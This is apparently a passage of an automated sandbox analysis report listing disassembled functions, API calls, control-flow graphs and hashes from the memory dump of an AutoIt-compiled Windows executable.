                                                                                                                                                                                                                    Function 00007FF656CB3B84 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60windowregistryCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                    • String ID: AutoIt v3
                                                                                                                                                                                                                    • API String ID: 423443420-1704141276
                                                                                                                                                                                                                    • Opcode ID: b93c51c6ba6201518573a4e6f5cf88ec382112454fc31c9e44e1a0e1eb884e3c
                                                                                                                                                                                                                    • Instruction ID: bd594cdeb15b526e3ebd9242abab92cb9d759d1d1d761df9b0978b61a32d8f21
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b93c51c6ba6201518573a4e6f5cf88ec382112454fc31c9e44e1a0e1eb884e3c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D5311936A08B028AEB40CB51F8447A93774FB58798F580B39C98DA7B64DFBED058C740
                                                                                                                                                                                                                    Function 00007FF656CF7348 Relevance: 13.8, APIs: 9, Instructions: 272fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 419 7ff656cf7348-7ff656cf73ba call 7ff656cf7078 422 7ff656cf73d3-7ff656cf73dd call 7ff656cee418 419->422 423 7ff656cf73bc-7ff656cf73c4 call 7ff656ce55b4 419->423 429 7ff656cf73df-7ff656cf73f5 call 7ff656ce55b4 call 7ff656ce55d4 422->429 430 7ff656cf73f7-7ff656cf7463 CreateFileW 422->430 428 7ff656cf73c7-7ff656cf73ce call 7ff656ce55d4 423->428 446 7ff656cf771a-7ff656cf7736 428->446 429->428 432 7ff656cf74eb-7ff656cf74f6 GetFileType 430->432 433 7ff656cf7469-7ff656cf7470 430->433 439 7ff656cf74f8-7ff656cf7533 GetLastError call 7ff656ce5564 CloseHandle 432->439 440 7ff656cf7549-7ff656cf754f 432->440 436 7ff656cf7472-7ff656cf7476 433->436 437 7ff656cf74b8-7ff656cf74e6 GetLastError call 7ff656ce5564 433->437 436->437 444 7ff656cf7478-7ff656cf74b6 CreateFileW 436->444 437->428 439->428 454 7ff656cf7539-7ff656cf7544 call 7ff656ce55d4 439->454 442 7ff656cf7551-7ff656cf7554 440->442 443 7ff656cf7556-7ff656cf7559 440->443 449 7ff656cf755e-7ff656cf75ac call 7ff656cee334 442->449 443->449 450 7ff656cf755b 443->450 444->432 444->437 458 7ff656cf75c0-7ff656cf75ea call 7ff656cf6de4 449->458 459 7ff656cf75ae-7ff656cf75ba call 7ff656cf7284 449->459 450->449 454->428 464 7ff656cf75fe-7ff656cf7643 458->464 465 7ff656cf75ec 458->465 466 7ff656cf75ef-7ff656cf75f9 call 7ff656cf04b8 459->466 467 7ff656cf75bc 459->467 469 7ff656cf7665-7ff656cf7671 464->469 470 7ff656cf7645-7ff656cf7649 464->470 465->466 466->446 467->458 473 7ff656cf7718 469->473 474 7ff656cf7677-7ff656cf767b 469->474 470->469 472 7ff656cf764b-7ff656cf7660 470->472 472->469 473->446 474->473 475 7ff656cf7681-7ff656cf76c9 CloseHandle CreateFileW 474->475 476 7ff656cf76fe-7ff656cf7713 475->476 477 7ff656cf76cb-7ff656cf76f9 GetLastError call 7ff656ce5564 call 7ff656cee548 475->477 476->473 477->476
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1617910340-0
                                                                                                                                                                                                                    • Opcode ID: bd4a1088ede243f3322a3f1c9bbf7769167306ab08ad22946a7c562bc07e9b3d
                                                                                                                                                                                                                    • Instruction ID: 447db6cab9a46ebecd7da4e66ffaba79089c930e68cecbbbf68731973891b042
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd4a1088ede243f3322a3f1c9bbf7769167306ab08ad22946a7c562bc07e9b3d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 86C1DF72B18A428AEB508F64D4413AC3771EB49BA8F085335DE2EAB7D5DF3AE455C310
                                                                                                                                                                                                                    Function 00007FF656CC25BC Relevance: 12.4, APIs: 8, Instructions: 442windowtimeCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 557 7ff656cc25bc-7ff656cc263d 561 7ff656cc287e-7ff656cc28af 557->561 562 7ff656cc2643-7ff656cc267c 557->562 564 7ff656cc2680-7ff656cc2687 562->564 565 7ff656cc2856-7ff656cc2876 564->565 566 7ff656cc268d-7ff656cc26a1 564->566 565->561 568 7ff656d0d148-7ff656d0d14f 566->568 569 7ff656cc26a7-7ff656cc26bc 566->569 572 7ff656cc2702-7ff656cc2723 568->572 573 7ff656d0d155 568->573 570 7ff656cc26c2-7ff656cc26c9 569->570 571 7ff656cc29c8-7ff656cc29eb PeekMessageW 569->571 570->571 576 7ff656cc26cf-7ff656cc26d4 570->576 574 7ff656cc29f1-7ff656cc29f5 571->574 575 7ff656cc26e8-7ff656cc26ef 571->575 589 7ff656cc276e-7ff656cc27d2 572->589 590 7ff656cc2725-7ff656cc272c 572->590 578 7ff656d0d15a-7ff656d0d160 573->578 579 7ff656d0d1aa-7ff656d0d1bb 574->579 580 7ff656cc29fb-7ff656cc2a05 574->580 582 7ff656cc26f5-7ff656cc26fc 575->582 583 7ff656d0e285-7ff656d0e293 575->583 576->571 581 7ff656cc26da-7ff656cc26e2 GetInputState 576->581 585 7ff656d0d19b 578->585 586 7ff656d0d162-7ff656d0d176 578->586 579->575 580->578 587 7ff656cc2a0b-7ff656cc2a1d call 7ff656cd2de8 580->587 581->571 581->575 582->572 588 7ff656d0e29d-7ff656d0e2b5 call 7ff656ccf1c4 582->588 583->588 585->579 586->585 591 7ff656d0d178-7ff656d0d17f 586->591 602 7ff656cc2a1f-7ff656cc2a2d TranslateMessage DispatchMessageW 587->602 603 7ff656cc2a33-7ff656cc2a4f PeekMessageW 587->603 588->565 627 7ff656d0e276 589->627 628 7ff656cc27d8-7ff656cc27da 589->628 590->589 595 7ff656cc272e-7ff656cc2738 590->595 591->585 596 7ff656d0d181-7ff656d0d190 TranslateAcceleratorW 591->596 600 7ff656cc273f-7ff656cc2742 595->600 596->587 601 7ff656d0d196 596->601 605 7ff656cc28b0-7ff656cc28b7 600->605 606 7ff656cc2748 600->606 601->603 602->603 603->575 610 7ff656cc2a55 603->610 608 7ff656cc28b9-7ff656cc28cc timeGetTime 605->608 609 7ff656cc28eb-7ff656cc28ef 605->609 611 7ff656cc274f-7ff656cc2752 606->611 613 7ff656d0d2ab-7ff656d0d2b0 608->613 614 7ff656cc28d2-7ff656cc28d7 608->614 609->600 610->574 615 7ff656cc28f4-7ff656cc28fb 611->615 616 7ff656cc2758-7ff656cc2761 611->616 620 7ff656d0d2b6 613->620 621 7ff656cc28dc-7ff656cc28e5 613->621 614->621 622 7ff656cc28d9 614->622 623 7ff656cc2901-7ff656cc2905 615->623 624 7ff656d0d2f8-7ff656d0d303 615->624 617 7ff656d0d4c7-7ff656d0d4ce 616->617 618 7ff656cc2767 616->618 618->589 629 7ff656d0d2bb-7ff656d0d2f3 timeGetTime call 7ff656cd2ac0 call 7ff656d33a28 620->629 621->609 621->629 622->621 623->611 625 7ff656d0d309-7ff656d0d30c 624->625 626 7ff656d0d305 624->626 630 7ff656d0d30e 625->630 631 7ff656d0d312-7ff656d0d319 625->631 626->625 627->583 628->627 632 7ff656cc27e0-7ff656cc27ee 628->632 629->609 630->631 634 7ff656d0d31b 631->634 635 7ff656d0d322-7ff656d0d329 631->635 632->627 636 7ff656cc27f4-7ff656cc2819 632->636 634->635 638 7ff656d0d32b 635->638 639 7ff656d0d332-7ff656d0d33d call 7ff656cd42a0 635->639 640 7ff656cc281f-7ff656cc2829 call 7ff656cc2b70 636->640 641 7ff656cc290a-7ff656cc290d 636->641 638->639 639->606 639->617 652 7ff656cc282e-7ff656cc2836 640->652 645 7ff656cc2931-7ff656cc2933 641->645 646 7ff656cc290f-7ff656cc291a call 7ff656cc2e30 641->646 649 7ff656cc2971-7ff656cc2974 645->649 650 7ff656cc2935-7ff656cc2949 call 7ff656cc66c0 645->650 646->652 655 7ff656d0dfbe-7ff656d0dfc0 649->655 656 7ff656cc297a-7ff656cc2997 call 7ff656cc01a0 649->656 659 7ff656cc294e-7ff656cc2950 650->659 657 7ff656cc299e-7ff656cc29ab 652->657 658 7ff656cc283c 652->658 661 7ff656d0dfed-7ff656d0dff6 655->661 662 7ff656d0dfc2-7ff656d0dfc5 655->662 669 7ff656cc299c 656->669 663 7ff656cc29b1-7ff656cc29be call 7ff656cd4c24 657->663 664 7ff656d0e181-7ff656d0e197 call 7ff656cd4c24 * 2 657->664 665 7ff656cc2840-7ff656cc2843 658->665 659->652 668 7ff656cc2956-7ff656cc2966 659->668 666 7ff656d0dff8-7ff656d0e003 661->666 667 7ff656d0e005-7ff656d0e00c 661->667 662->665 671 7ff656d0dfcb-7ff656d0dfe7 call 7ff656cc3c20 662->671 663->571 664->627 673 7ff656cc2849-7ff656cc2850 665->673 674 7ff656cc2b17-7ff656cc2b1d 665->674 675 7ff656d0e00f-7ff656d0e016 call 7ff656d48b98 666->675 667->675 668->652 676 7ff656cc296c 668->676 669->659 671->661 673->564 673->565 674->673 677 7ff656cc2b23-7ff656cc2b2d 674->677 688 7ff656d0e0d7-7ff656d0e0d9 675->688 689 7ff656d0e01c-7ff656d0e036 call 7ff656d334e4 675->689 683 7ff656d0e0f4-7ff656d0e10e call 7ff656d334e4 676->683 677->568 691 7ff656d0e147-7ff656d0e14e 683->691 692 7ff656d0e110-7ff656d0e11d 683->692 693 7ff656d0e0db 688->693 694 7ff656d0e0df-7ff656d0e0ee call 7ff656d4a320 688->694 705 7ff656d0e038-7ff656d0e045 689->705 706 7ff656d0e06f-7ff656d0e076 689->706 691->673 698 7ff656d0e154-7ff656d0e15a 691->698 696 7ff656d0e11f-7ff656d0e130 call 7ff656cd4c24 * 2 692->696 697 7ff656d0e135-7ff656d0e142 call 7ff656cd4c24 692->697 693->694 694->683 696->697 697->691 698->673 703 7ff656d0e160-7ff656d0e169 698->703 703->664 710 7ff656d0e047-7ff656d0e058 call 7ff656cd4c24 * 2 705->710 711 7ff656d0e05d-7ff656d0e06a call 7ff656cd4c24 705->711 706->673 708 7ff656d0e07c-7ff656d0e082 706->708 708->673 714 7ff656d0e088-7ff656d0e091 708->714 710->711 711->706 714->688
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Message$Peek$DispatchInputStateTimeTranslatetime
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3249950245-0
                                                                                                                                                                                                                    • Opcode ID: a7bd3d3d385e5b1d1f54d85392a1c68edf1031921459ddba508b5b03e4368d75
                                                                                                                                                                                                                    • Instruction ID: 8fae4cade2506322f9304e5aa599a643e4485b0353af9defe8b0c877135ad226
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a7bd3d3d385e5b1d1f54d85392a1c68edf1031921459ddba508b5b03e4368d75
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C9229C72A0C68286FB748B25E4907B937B0FB45B58F184636CA5FA3695DF3EE485C700
                                                                                                                                                                                                                    Function 00007FF656CB3CBC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 849 7ff656cb3cbc-7ff656cb3d88 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$Create$Show
                                                                                                                                                                                                                    • String ID: AutoIt v3$d$edit
                                                                                                                                                                                                                    • API String ID: 2813641753-2600919596
                                                                                                                                                                                                                    • Opcode ID: 412c1a8e669cd880a5e6e492a58c687317b7b955f6e005d5c76c80bfee5a5580
                                                                                                                                                                                                                    • Instruction ID: 6a6bf6a683b54208f01fe1a52480543b5ef7eceb960261d7c6a603159624a361
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 412c1a8e669cd880a5e6e492a58c687317b7b955f6e005d5c76c80bfee5a5580
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09212C72A2CB4186EB50CF10F44872977A0F789799F144B38D68D96654CFBED185CB00
                                                                                                                                                                                                                    Function 00007FF656CB7EC0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185comCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CD2D5C: MapVirtualKeyW.USER32(?,?,?,00007FF656CB7FA5), ref: 00007FF656CD2D8E
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CD2D5C: MapVirtualKeyW.USER32(?,?,?,00007FF656CB7FA5), ref: 00007FF656CD2D9C
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CD2D5C: MapVirtualKeyW.USER32(?,?,?,00007FF656CB7FA5), ref: 00007FF656CD2DAC
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CD2D5C: MapVirtualKeyW.USER32(?,?,?,00007FF656CB7FA5), ref: 00007FF656CD2DBC
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CD2D5C: MapVirtualKeyW.USER32(?,?,?,00007FF656CB7FA5), ref: 00007FF656CD2DCA
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CD2D5C: MapVirtualKeyW.USER32(?,?,?,00007FF656CB7FA5), ref: 00007FF656CD2DD8
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CCEEC8: RegisterWindowMessageW.USER32 ref: 00007FF656CCEF76
                                                                                                                                                                                                                    • GetStdHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF656CB106D), ref: 00007FF656CB8209
                                                                                                                                                                                                                    • OleInitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF656CB106D), ref: 00007FF656CB828F
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF656CB106D), ref: 00007FF656CFD36A
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                                                                    • String ID: AutoIt
                                                                                                                                                                                                                    • API String ID: 1986988660-2515660138
                                                                                                                                                                                                                    • Opcode ID: 05bbf670eb9e39fefa972cb9767a51cd3be064064f2c67d840eb130580157bae
                                                                                                                                                                                                                    • Instruction ID: 7ea80f62d6c2dd9a4539b7069cd453d59b92fc34165f77df1eedb3cea70f0d13
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 05bbf670eb9e39fefa972cb9767a51cd3be064064f2c67d840eb130580157bae
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A4C1DE71D1DB4289E640DF24E8810B877A8BF99348F5C4B3AD55DE26B1EF7EA184C780
                                                                                                                                                                                                                    Function 00007FF656CB72C8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: IconLoadNotifyShell_Stringwcscpy
                                                                                                                                                                                                                    • String ID: Line:
                                                                                                                                                                                                                    • API String ID: 3135491444-1585850449
                                                                                                                                                                                                                    • Opcode ID: 5074f82189a2094c4f41beacacc753a6552d6d2ec3054edcc5b8ee4ef305b935
                                                                                                                                                                                                                    • Instruction ID: 59e7fa959170871f02ae29b5bae3e7c4f16d7a5b35ba917d9395ae71afd25447
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5074f82189a2094c4f41beacacc753a6552d6d2ec3054edcc5b8ee4ef305b935
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A4167B1A0C68296EB20DB10E4402F96371FB45388FCC5536DA8DA76A9DF7ED544C750
                                                                                                                                                                                                                    Function 00007FF656CB3F04 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetOpenFileNameW.COMDLG32 ref: 00007FF656CFBAA2
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CB56D4: GetFullPathNameW.KERNEL32(?,00007FF656CB56C1,?,00007FF656CB7A0C,?,?,?,00007FF656CB109E), ref: 00007FF656CB56FF
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CB3EB4: GetLongPathNameW.KERNELBASE ref: 00007FF656CB3ED8
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                                                                    • String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$au3
                                                                                                                                                                                                                    • API String ID: 779396738-2360590182
                                                                                                                                                                                                                    • Opcode ID: 3d3fc2c380e417bd563531e27a10fb74c95a399e56ca3ea23b17778c650accb1
                                                                                                                                                                                                                    • Instruction ID: 842c439517ed498aad17afc58e31e2afd17c611a6d3f9700a9c1404c29a17677
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d3fc2c380e417bd563531e27a10fb74c95a399e56ca3ea23b17778c650accb1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 29314D72608B8289E710DF22E8441AD77B4FB49B84F984275DE8C97BA5DF3DD545C700
                                                                                                                                                                                                                    Function 00007FF656CD4610 Relevance: 4.6, APIs: 3, Instructions: 67timewindowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: IconNotifyShell_Timer$Killwcscpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3812282468-0
                                                                                                                                                                                                                    • Opcode ID: 1dc440ecac87e2ff0ffd0982a4a0d0d2f1018b32bcde9ffe5d1424b8b2f1a591
                                                                                                                                                                                                                    • Instruction ID: fd7978def913d43a460119452198856ee39b9199b007c48ee3002d7284b98e46
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1dc440ecac87e2ff0ffd0982a4a0d0d2f1018b32bcde9ffe5d1424b8b2f1a591
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD31D462A4C7C287EB618B2190406BD37A8EB45FC8F5C4636DE4D9B749CE3ED644C750
                                                                                                                                                                                                                    Function 00007FF656CB6F60 Relevance: 4.6, APIs: 3, Instructions: 57registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,?,00007FF656CB6F52,?,?,?,?,?,?,00007FF656CB782C), ref: 00007FF656CB6FA5
                                                                                                                                                                                                                    • RegQueryValueExW.KERNELBASE(?,?,?,?,?,?,?,00007FF656CB6F52,?,?,?,?,?,?,00007FF656CB782C), ref: 00007FF656CB6FD3
                                                                                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,00007FF656CB6F52,?,?,?,?,?,?,00007FF656CB782C), ref: 00007FF656CB6FFA
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
